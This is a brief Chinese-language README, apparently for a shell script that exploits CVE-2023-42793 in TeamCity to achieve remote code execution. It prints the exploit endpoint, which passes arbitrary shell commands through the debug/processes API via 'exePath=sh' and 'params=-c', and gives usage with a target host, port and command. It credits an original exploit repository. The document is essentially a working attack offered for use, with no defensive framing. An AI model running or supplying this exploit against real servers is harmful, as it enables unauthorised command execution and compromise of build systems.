一个快速利用 cve-2023-42793 漏洞的脚本。关于该漏洞的更多信息可参见:
https://www.cnblogs.com/LittleHann/p/17843271.html
该脚本增加了在触发 RCE 漏洞后自由使用 "params" 执行命令的能力:
RCE_ENDPOINT="${BASE_URL}:${PORT}/app/rest/debug/processes?exePath=sh¶ms=-c¶ms=${URLCMD}"
Usage: <base_url> <port> <command>
./TeamCity.sh blah.com 8111 "ls -lah"
原始脚本在此,完全归功于他们:https://github.com/Zenmovie/CVE-2023-42793